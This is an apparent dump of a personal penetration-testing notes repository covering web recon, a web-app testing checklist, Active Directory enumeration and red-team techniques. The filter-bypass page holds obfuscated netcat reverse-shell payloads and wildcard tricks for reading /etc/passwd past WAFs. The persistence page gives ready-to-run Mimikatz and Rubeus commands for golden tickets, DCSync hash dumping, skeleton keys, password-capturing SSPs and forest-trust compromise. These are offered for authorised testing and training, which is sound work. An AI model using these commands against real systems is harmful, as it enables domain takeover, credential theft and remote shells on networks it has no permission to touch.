``` 82 | nmap --script http-methods --script-args http-methods.url-path='/test' $ip 83 | ``` 84 | 85 | ### Uniscan 86 | 87 | directory finder: 88 | 89 | ``` 90 | uniscan -qweds -u <> 91 | ``` 92 | 93 | ### Wfuzz - The web brute forcer 94 | 95 | ``` 96 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test 97 | 98 | wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ 99 | 100 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" 101 | 102 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ 103 | ``` 104 | 105 | * Recurse level 3 106 | 107 | ``` 108 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ 109 | ``` 110 | 111 | ### Misc 112 | 113 | * Get Options available from web server 114 | 115 | ``` 116 | curl -vX OPTIONS vm/test 117 | ``` 118 | 119 | * Open a service using a port knock (Secured with Knockd) 120 | 121 | ``` 122 | for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 -max-retries 0 -p $x server_ip_address; done 123 | ``` 124 | 125 | * WordPress Scan - Wordpress security scanner 126 | 127 | ``` 128 | wpscan --url $ip/blog --proxy $ip:3129 129 | ``` 130 | 131 | * RSH Enumeration - Unencrypted file transfer system 132 | 133 | ``` 134 | auxiliary/scanner/rservices/rsh_login 135 | ``` 136 | 137 | * Finger Enumeration 138 | 139 | ``` 140 | finger @$ip 141 | 142 | finger batman@$ip 143 | ``` 144 | 145 | * TLS & SSL Testing 146 | 147 | ``` 148 | ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html 149 | ``` 150 | 151 | ## 152 | -------------------------------------------------------------------------------- /web/web-notes/the-web-application-hackers-handbook.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Web Application Hacker's Handbook Task Checklist 3 | --- 4 | 5 | # The Web Application Hacker's Handbook 6 | 7 | Based off of the original _Web Application Hacker's Handbook_, this project was revamped as a free online training site at [https://portswigger.net/web-security](https://portswigger.net/web-security). The author of the original books worked in conjunction with Portswigger to create the Web Security Academy. The below checklist is meant as a methodology to complement their training. 8 | 9 | ## Task Checklist 10 | 11 | ### Recon and analysis 12 | 13 | * [ ] Map visible content 14 | * [ ] Discover hidden & default content 15 | * [ ] Test for debug parameters 16 | * [ ] Identify data entry points 17 | * [ ] Identify the technologies used 18 | * [ ] Map the attack surface 19 | 20 | ### Test handling of Identity and Access Management \(IAM\) 21 | 22 | * [ ] Authentication 23 | * [ ] Test password quality rules 24 | * [ ] Test for username enumeration 25 | * [ ] Test resilience to password guessing 26 | * [ ] Test any account recovery function 27 | * [ ] Test any "remember me" function 28 | * [ ] Test any impersonation function 29 | * [ ] Test username uniqueness 30 | * [ ] Check for unsafe distribution of credentials 31 | * [ ] Test for fail-open conditions 32 | * [ ] Test any multi-stage mechanisms 33 | * [ ] Session handling 34 | * [ ] Test tokens for meaning 35 | * [ ] Test tokens for predictability 36 | * [ ] Check for insecure transmission of tokens 37 | * [ ] Check for disclosure of tokens in logs 38 | * [ ] Check mapping of tokens to sessions 39 | * [ ] Check session termination 40 | * [ ] Check for session fixation 41 | * [ ] Check for cross-site request forgery 42 | * [ ] Check cookie scope 43 | * [ ] Access controls 44 | * [ ] Understand the access control requirements 45 | * [ ] Test effectiveness of controls, using multiple accounts if possible 46 | * [ ] Test for insecure access control methods \(request parameters, Referer header, etc\) 47 | 48 | ### Test handling of input 49 | 50 | * [ ] Fuzz all request parameters 51 | * [ ] Test for SQL injection 52 | * [ ] Identify all reflected data 53 | * [ ] Test for reflected XSS 54 | * [ ] Test for HTTP header injection 55 | * [ ] Test for arbitrary redirection 56 | * [ ] Test for stored attacks 57 | * [ ] Test for OS command injection 58 | * [ ] Test for path traversal 59 | * [ ] Test for script injection 60 | * [ ] Test for file inclusion 61 | * [ ] Test for SMTP injection 62 | * [ ] Test for native software flaws \(buffer overflow, integer bugs, format strings\) 63 | * [ ] Test for SOAP injection 64 | * [ ] Test for LDAP injection 65 | * [ ] Test for XPath injection 66 | 67 | ### Test application logic 68 | 69 | * [ ] Identify the logic attack surface 70 | * [ ] Test transmission of data via the client 71 | * [ ] Test for reliance on client-side input validation 72 | * [ ] Test any thick-client components \(Java, ActiveX, Flash\) 73 | * [ ] Test multi-stage processes for logic flaws 74 | * [ ] Test handling of incomplete input 75 | * [ ] Test trust boundaries 76 | * [ ] Test transaction logic 77 | 78 | ### Assess application hosting 79 | 80 | * [ ] Test segregation in shared infrastructures 81 | * [ ] Test segregation between ASP-hosted applications 82 | * [ ] Test for web server vulnerabilities 83 | * [ ] Default credentials 84 | * [ ] Default content 85 | * [ ] Dangerous HTTP methods 86 | * [ ] Proxy functionality 87 | * [ ] Virtual hosting misconfiguration 88 | * [ ] Bugs in web server software 89 | 90 | ### Miscellaneous tests 91 | 92 | * [ ] Check for DOM-based attacks 93 | * [ ] Check for frame injection 94 | * [ ] Check for local privacy vulnerabilities 95 | * [ ] Persistent cookies 96 | * [ ] Caching 97 | * [ ] Sensitive data in URL parameters 98 | * [ ] Forms with autocomplete enabled 99 | * [ ] Follow up any information leakage 100 | * [ ] Check for weak SSL ciphers 101 | 102 | ## References 103 | 104 | * [https://portswigger.net/web-security](https://portswigger.net/web-security) 105 | * [https://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab](https://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab) 106 | 107 | 108 | 109 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 110 | 111 | -------------------------------------------------------------------------------- /web/web-notes/web-filter-bypass.md: -------------------------------------------------------------------------------- 1 | # Web Filter Bypass 2 | 3 | ## Payloads and Bypass Methods for Web Filtering 4 | 5 | {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %} 6 | swisskyrepo / PayloadsAllTheThings 7 | {% endembed %} 8 | 9 | {% embed url="https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/" %} 10 | How To Exploit PHP Remotely To Bypass Filters & WAF Rules 11 | {% endembed %} 12 | 13 | ### Use Uninitialized Shell Variables to Bypass Filters 14 | 15 | {% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %} 16 | Web Application Firewall (WAF) Evasion Techniques #3 17 | {% endembed %} 18 | 19 | Uninitialized shell variables can be used for bypassing web application firewalls (WAF). Example: bypassing a filter to execute a reverse shell - `nc$u -e /bin$u/bash$u `. If this doesn't work try adding spaces before and after the variable (note the `+`'s, this example is also URL encoded): `nc+$u++-e+/bin$u/bash$u ` _(`$u` in this case is a random attacker-picked variable that would hopefully be uninitialized on the target)._ 20 | 21 | ### Use Wildcards to Bypass Filters 22 | 23 | {% embed url="https://medium.com/secjuice/waf-evasion-techniques-718026d693d8" %} 24 | Web Application Firewall (WAF) Evasion Techniques 25 | {% endembed %} 26 | 27 | Bypass web filters by using bash wildcards:`/???/?s` `/?cmd=%2f???%2f??t%20%2f???%2fp??s??` will bypass...and execute every command that matches. such as `/bin/cat /etc/apt`, and `/bin/cat /etc/passwd` 28 | 29 | netcat firewall bypass: `/???/n? -e /???/b??h 2130706433 1337` (`/???/?c.??????????? -e /???/b??h 2130706433 1337` for nc traditional) 30 | 31 | ``` 32 | Standard: /bin/nc 127.0.0.1 1337 33 | Evasion:/???/n? 2130706433 1337 34 | Used chars: / ? n [0-9] 35 | 36 | Standard: /bin/cat /etc/passwd 37 | Evasion: /???/??t /???/??ss?? 38 | Used chars: / ? t s 39 | ``` 40 | 41 | ### Use String Concatenation to Bypass Filters 42 | 43 | ``` 44 | $ /bin/cat /etc/passwd 45 | $ /bin/cat /e'tc'/pa'ss'wd 46 | $ /bin/c'at' /e'tc'/pa'ss'wd 47 | $ /b'i'n/c'a't /e't'c/p'a's's'w'd' 48 | Can use \\ instead of ' as well 49 | ``` 50 | 51 | ### Convert IP Address to Other Formats 52 | 53 | * [https://h.43z.one/ipconverter/](https://h.43z.one/ipconverter/) 54 | 55 | It is still understood by most programs and languages when converted to other formats, such as decimal, and avoids `.` character in filtered HTTP requests: `127.0.0.1 = 2130706433` 56 | 57 | ``` 58 | http://127.0.0.1 59 | 60 | #0 Concatenation 61 | http://127.0.1 62 | http://127.1 63 | 64 | #Decimal 65 | http://2130706433 66 | 67 | #Hexidecimal 68 | http://0x7f000001 69 | 70 | #Dotted Hexidecimal 71 | http://0x7f.0x0.0x0.0x1 72 | http://0x7f.0x000001 73 | http://0x7f.0x0.00x0001 74 | 75 | #Others (need descriptions) 76 | http://0177.00.00.01 77 | http://000000177.0000000.000000000.0001 78 | http://017700000001 79 | http://%31%32%37%2e%30%2e%30%2e%31 80 | http://127.0x0.000000000.0x1 81 | http://①②⑦.⓪.⓪.① 82 | ``` 83 | 84 | Injecting IPs when `.` is disallowed: convert dotted-decimal format to decimal value - [`ip2dh`](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py) 85 | 86 | ### LFI / RFI by Bypassing Filters Using Wrappers 87 | 88 | From [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/73aa26ba6891981ec2254907b9bbd4afdc745e1d/File%20Inclusion/README.md#lfi--rfi-using-wrappers) `php://filter/` has multiple ways to bypass PHP input filters ;These can be chained with `|` or `/` : zip, data, expect, input, phar; many more different wrappers to try! 89 | 90 | ```php 91 | /zlib.deflate/read=string.rot13/convert.base64-encode/convert.iconv.utf-8.utf-16/resource= 92 | ``` 93 | 94 | ## 95 | -------------------------------------------------------------------------------- /windows-1/active-directory.md: -------------------------------------------------------------------------------- 1 | # Active Directory 2 | 3 | ## Get Domain Information 4 | 5 | ``` 6 | nltest /DCLIST:DomainName 7 | nltest /DCNAME:DomainName 8 | nltest /DSGETDC:DomainName 9 | ``` 10 | 11 | ### Get Current Domain Info - Similar to Get-Domain 12 | 13 | ```powershell 14 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 15 | ``` 16 | 17 | ### View Domain Forest Info 18 | 19 | ```powershell 20 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() 21 | ``` 22 | ### View Domain Trust Information 23 | 24 | #### Using PowerShell 25 | 26 | ```powershell 27 | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() 28 | 29 | ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships() 30 | ``` 31 | 32 | #### Using CMD.exe 33 | 34 | ``` 35 | nltest /domain_trusts 36 | 37 | nltest [server:] /domain_trusts /all_trusts /v 38 | 39 | nltest /dsgetfti: 40 | 41 | nltest /server: /domain_trusts /all_trusts 42 | ``` 43 | 44 | ### View All Domain Controllers 45 | 46 | ``` 47 | nltest /dclist:$domainFQDN 48 | net group "domain controllers" /domain 49 | ``` 50 | 51 | ### View DC for Current Session 52 | 53 | ``` 54 | nltest /dsgetdc:$domainFQDN 55 | ``` 56 | 57 | ## Kerberos 58 | 59 | ### get domain name and DC the user authenticated to 60 | 61 | ``` 62 | klist 63 | ``` 64 | 65 | ### Get All Logged on Sessions, Includes NTLM & Kerberos 66 | 67 | ``` 68 | klist sessions 69 | ``` 70 | 71 | ### View Current Kerberos Tickets 72 | 73 | ``` 74 | klist 75 | ``` 76 | 77 | ### View Cached Krbtgt 78 | 79 | ``` 80 | klist tgt 81 | ``` 82 | 83 | ## User Enumeration 84 | 85 | ### Get User-related Environment Variables (cmd.exe) 86 | 87 | ``` 88 | set u 89 | ``` 90 | 91 | ### List all Usernames 92 | 93 | ```powershell 94 | ([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname 95 | ``` 96 | 97 | ### List Administrators 98 | 99 | ```powershell 100 | ([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname 101 | ``` 102 | 103 | ### List all Info about Specific User 104 | 105 | #### Using PowerShell 106 | 107 | ```powershell 108 | ([adsisearcher]"(&(objectClass=User)(samaccountname=))").FindAll().Properties 109 | ``` 110 | 111 | #### Using CMD.exe 112 | 113 | ``` 114 | nltest /user:"zweilos" 115 | ``` 116 | 117 | ### View All Users with Description Field Set 118 | 119 | ```powershell 120 | ([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description } 121 | ``` 122 | -------------------------------------------------------------------------------- /windows-1/hardening-and-setup.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A collection of useful programs and configurations for getting your home box 4 | set up for pre-engagement use. I think I want to rename this page to something 5 | else...can't think of a good title right now 6 | --- 7 | 8 | # Hardening & Setup 9 | 10 | ## Hardening the OS 11 | 12 | ### Disable unused services 13 | 14 | Disable WinRM, RDP, etc if not used 15 | 16 | ### Reduce Privacy Disclosures 17 | 18 | disable location, telemetry, etc 19 | 20 | ## Recommended Programs 21 | 22 | {% embed url="https://ninite.com" %} 23 | 24 | notepad++ 25 | 26 | Visual Studio Code 27 | 28 | Tor Browser - based on Firefox. Be careful of settings and extensions used as these can break the protection provided by the VPN. 29 | 30 | -------------------------------------------------------------------------------- /windows-1/windows-hardening.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A collection of useful programs and configurations for getting your home box 4 | set up for pre-engagement use. I think I want to rename this page to something 5 | else...can't think of a good title right now 6 | --- 7 | 8 | # Hardening & Setup 9 | 10 | {% hint style="danger" %} 11 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 12 | {% endhint %} 13 | 14 | ## Hardening the OS 15 | 16 | ### Disable unused services 17 | 18 | Disable WinRM, RDP, etc if not used 19 | 20 | ### Reduce Privacy Disclosures 21 | 22 | disable location, telemetry, etc 23 | 24 | ## Recommended Programs 25 | 26 | {% embed url="https://ninite.com" %} 27 | 28 | * [notepad++](https://notepad-plus-plus.org/) 29 | * [Visual Studio Code](https://code.visualstudio.com/) 30 | * [Tor Browser](https://www.torproject.org/) 31 | * Based on Firefox. Be careful of settings and extensions used as these can break the protection provided by the VPN. 32 | 33 | 34 | 35 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 36 | -------------------------------------------------------------------------------- /windows-1/windows-redteam/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: 'Sorted Linux notes, need to separate to different pages and reorganize' 3 | --- 4 | 5 | # Red Team Notes 6 | 7 | {% hint style="success" %} 8 | Hack Responsibly. 9 | 10 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 11 | {% endhint %} 12 | 13 | living off the land binaries: [LOLBAS](https://lolbas-project.github.io/) 14 | 15 | ## Enumeration 16 | 17 | Windows Privilege Escalation Enumeration Script: [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) 18 | 19 | Little bit o' everything: [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/) 20 | 21 | ## Shares 22 | 23 | ### Mounting NFS Shares Remotely 24 | 25 | {% embed url="https://resources.infosecinstitute.com/exploiting-nfs-share/" %} 26 | 27 | ```text 28 | showmount -e 29 | 30 | mkdir /tmp/:/ /tmp/ 32 | ``` 33 | 34 | ### Using `smbmount` 35 | 36 | ```text 37 | smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw 38 | ``` 39 | 40 | Where `/mnt/remote` is the local folder to mount the share to. 41 | 42 | ## Unsorted 43 | 44 | Netcat reverse shell \(after uploading the binary!\): `nc64.exe -e cmd ` 45 | 46 | 5KFB6 tools: [https://specterops.io/resources/research-and-development](https://specterops.io/resources/research-and-development) 47 | 48 | easy windows shell: unicorn.py [trustedsec/unicorn](https://github.com/trustedsec/unicorn) [HackTheBox - Arctic](https://www.youtube.com/watch?v=e9lVyFH7-4o) 49 | 50 | system information: `sysinfo` 51 | 52 | Get user id: `getuid` 53 | 54 | Powershell privilege escalation: 55 | 56 | * [PowerUp.ps1](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) from PowerShellEmpire 57 | * Sherlock.ps1 58 | 59 | [fuzzbunch](https://github.com/peterpt/fuzzbunch): exploit tool similar to metasploit 60 | 61 | check what updates are installed: `type WindowsUpdate.log` 62 | 63 | net use share from linux \[like SimpleHTTPServer for Samba\]: `impacket-smbserver ''` 64 | 65 | 66 | 67 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 68 | 69 | -------------------------------------------------------------------------------- /windows-1/windows-redteam/active-directory/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Active Directory-Specific commands and strategies 3 | --- 4 | 5 | # Active Directory 6 | 7 | {% hint style="success" %} 8 | Hack Responsibly. 9 | 10 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 11 | {% endhint %} 12 | 13 | ## Table of Contents 14 | 15 | ### [Enumeration](enumeration.md) 16 | 17 | ### [Getting Access](getting-access.md) 18 | 19 | ### [Privilege Escalation](privilege-escalation.md) 20 | 21 | ### [Persistence](persistence.md) 22 | 23 | ## Tools 24 | 25 | * [Powersploit](https://github.com/PowerShellMafia/PowerSploit/tree/dev) 26 | * [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) 27 | * [Powermad](https://github.com/Kevin-Robertson/Powermad) 28 | * [Impacket](https://github.com/SecureAuthCorp/impacket) 29 | * [Mimikatz](https://github.com/gentilkiwi/mimikatz) 30 | * [Rubeus](https://github.com/GhostPack/Rubeus) -> [Compiled Version](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries) 31 | * [BloodHound](https://github.com/BloodHoundAD/BloodHound) 32 | * [AD Module](https://github.com/samratashok/ADModule) 33 | * [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) 34 | 35 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 36 | -------------------------------------------------------------------------------- /windows-1/windows-redteam/active-directory/getting-access.md: -------------------------------------------------------------------------------- 1 | # Getting Access 2 | 3 | {% hint style="success" %} 4 | **Hack Responsibly.** 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Lateral Movement 10 | 11 | ### PowerShell Remoting 12 | 13 | ```powershell 14 | #Enable Powershell Remoting on current Machine (Needs Admin Access) 15 | Enable-PSRemoting 16 | 17 | #Entering or Starting a new PSSession (Needs Admin Access) 18 | $sess = New-PSSession -ComputerName $ComputerName> 19 | Enter-PSSession -ComputerName $ComputerName 20 | #-OR- 21 | Enter-PSSession -Sessions $SessionName 22 | ``` 23 | 24 | ### Remote Code Execution with PS Credentials 25 | 26 | ```powershell 27 | $SecPassword = ConvertTo-SecureString '$Password' -AsPlainText -Force 28 | $Cred = New-Object System.Management.Automation.PSCredential('$DomainName\$User', $SecPassword) 29 | Invoke-Command -ComputerName $ComputerName -Credential $Cred -ScriptBlock {whoami /all} 30 | ``` 31 | 32 | ### Import a PowerShell module and execute its functions remotely 33 | 34 | ```powershell 35 | #Execute the command and start a session 36 | Invoke-Command -Credential $cred -ComputerName $ComputerName -FilePath $PSModule_FilePath -Session $sess 37 | 38 | #Interact with the session 39 | Enter-PSSession -Session $sess 40 | ``` 41 | 42 | ### Executing Remote Stateful commands 43 | 44 | ```powershell 45 | #Create a new session 46 | $sess = New-PSSession -ComputerName $ComputerName 47 | 48 | #Execute command on the session 49 | Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process} 50 | 51 | #Check the result of the command to confirm we have an interactive session 52 | Invoke-Command -Session $sess -ScriptBlock {$ps} 53 | ``` 54 | 55 | ### Useful Tools 56 | 57 | * [Powercat](https://github.com/besimorhino/powercat) netcat written in powershell, and provides tunneling, relay and portforward capabilities. 58 | * [SCShell](https://github.com/Mr-Un1k0d3r/SCShell) fileless lateral movement tool that relies on ChangeServiceConfigA to run command 59 | * [Evil-Winrm](https://github.com/Hackplayers/evil-winrm) the ultimate WinRM shell for hacking/pentesting 60 | * [RunasCs](https://github.com/antonioCoco/RunasCs) Csharp and open version of windows builtin runas.exe 61 | 62 | -------------------------------------------------------------------------------- /windows-1/windows-redteam/active-directory/persistence.md: -------------------------------------------------------------------------------- 1 | # Persistence 2 | 3 | {% hint style="success" %} 4 | **Hack Responsibly.** 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Domain Persistence 10 | 11 | ### Golden Ticket Attack 12 | 13 | ```powershell 14 | #Execute mimikatz on DC as DA to grab krbtgt hash: 15 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName 16 | 17 | #On any machine: 18 | Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /krbtgt: id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' 19 | ``` 20 | 21 | ### DCsync Attack 22 | 23 | ``` 24 | #DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges): 25 | Invoke-Mimikatz -Command '"lsadump::dcsync /user:\"' 26 | 27 | #DCsync using secretsdump.py from impacket with NTLM authentication 28 | secretsdump.py /:@ -just-dc-ntlm 29 | 30 | #DCsync using secretsdump.py from impacket with Kerberos Authentication 31 | secretsdump.py -no-pass -k /@ -just-dc-ntlm 32 | ``` 33 | 34 | **Tip:**\ 35 | /ptt -> inject ticket on current running session\ 36 | /ticket -> save the ticket on the system for later use 37 | 38 | ### Silver Ticket Attack 39 | 40 | ```powershell 41 | Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target: /service: /rc4: /user: /ptt"' 42 | ``` 43 | 44 | [SPN List](https://adsecurity.org/?page\_id=183) 45 | 46 | ### Skeleton Key Attack 47 | 48 | ```powershell 49 | #Exploitation Command runned as DA: 50 | Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName $DC_hostname 51 | 52 | #Access using the password "mimikatz" 53 | Enter-PSSession -ComputerName $ComputerName -Credential $Domain\$UserName 54 | ``` 55 | 56 | ### DSRM Abuse 57 | 58 | _Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!_ 59 | 60 | ```powershell 61 | #Dump DSRM password (needs DA privs): 62 | Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName $DC_hostname 63 | 64 | #This is a local account, so we can PTH and authenticate! 65 | #BUT we need to alter the behaviour of the DSRM account before pth: 66 | #Connect on DC: 67 | Enter-PSSession -ComputerName $DC_hostname 68 | 69 | #Alter the Logon behaviour on registry: 70 | New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose 71 | 72 | #If the property already exists: 73 | Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose 74 | ``` 75 | 76 | Then just PTH to get local admin access on DC! 77 | 78 | ### Custom SSP 79 | 80 | _We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!_ 81 | 82 | From powershell: 83 | 84 | ```powershell 85 | #Get current Security Package: 86 | $packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages' 87 | 88 | #Append mimilib: 89 | $packages += "mimilib" 90 | 91 | #Change the new packages name 92 | Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages 93 | Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages 94 | 95 | #ALTERNATIVE: 96 | Invoke-Mimikatz -Command '"misc::memssp"' 97 | ``` 98 | 99 | Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log 100 | 101 | ## Cross Forest Attacks 102 | 103 | ### Trust Tickets 104 | 105 | _If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT._ 106 | 107 | ⚠️ The access we will have will be limited to what our DA account is configured to have on the other Forest! 108 | 109 | #### Using Mimikatz: 110 | 111 | ```powershell 112 | #Dump the trust key 113 | Invoke-Mimikatz -Command '"lsadump::trust /patch"' 114 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 115 | 116 | #Forge an inter-realm TGT using the Golden Ticket attack 117 | Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /rc4: /service:krbtgt /target: /ticket:"' 118 | ``` 119 | 120 | ❗ Tickets -> .kirbi format 121 | 122 | Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource! 123 | 124 | #### Using Rubeus: 125 | 126 | ``` 127 | .\Rubeus.exe asktgs /ticket: /service:"Service's SPN" /ptt 128 | ``` 129 | 130 | ### Abuse MSSQL Servers 131 | 132 | * Enumerate MSSQL Instances: `Get-SQLInstanceDomain` 133 | * Check Accessibility as current user: 134 | 135 | ```powershell 136 | Get-SQLConnectionTestThreaded 137 | Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose 138 | ``` 139 | 140 | * Gather Information about the instance: `Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose` 141 | * Abusing SQL Database Links: _A database link allows a SQL Server to access other resources like other SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also works across Forest Trust!_ 142 | 143 | Check for existing Database Links: 144 | 145 | ``` 146 | #Check for existing Database Links: 147 | #PowerUpSQL: 148 | Get-SQLServerLink -Instance -Verbose 149 | 150 | #MSSQL Query: 151 | select * from master..sysservers 152 | ``` 153 | 154 | Then we can use queries to enumerate other links from the linked Database: 155 | 156 | ``` 157 | #Manualy: 158 | select * from openquery("LinkedDatabase", 'select * from master..sysservers') 159 | 160 | #PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests): 161 | Get-SQLServerLinkCrawl -Instance -Verbose 162 | 163 | #Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell 164 | #Or if it is disabled enable it: 165 | EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN" 166 | ``` 167 | 168 | Query execution: 169 | 170 | ``` 171 | Get-SQLServerLinkCrawl -Instace -Query "exec master..xp_cmdshell 'whoami'" 172 | ``` 173 | 174 | ### Breaking Forest Trusts 175 | 176 | _If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest._ 177 | 178 | Tools we are going to use: 179 | 180 | * [Rubeus](https://github.com/GhostPack/Rubeus) 181 | * [SpoolSample](https://github.com/leechristensen/SpoolSample) 182 | * [Mimikatz](https://github.com/gentilkiwi/mimikatz) 183 | 184 | Exploitation example: 185 | 186 | ``` 187 | #Start monitoring for TGTs with rubeus: 188 | Rubeus.exe monitor /interval:5 /filteruser:target-dc$ 189 | 190 | #Execute the printerbug to trigger the force authentication of the target DC to our machine 191 | SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local 192 | 193 | #Get the base64 captured TGT from Rubeus and inject it into memory: 194 | Rubeus.exe ptt /ticket: 195 | 196 | #Dump the hashes of the target domain using mimikatz: 197 | lsadump::dcsync /domain:external.forest.local /all 198 | ``` 199 | 200 | Detailed Articles: 201 | 202 | * [Not A Security Boundary: Breaking Forest Trusts](https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/) 203 | * [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) 204 | --------------------------------------------------------------------------------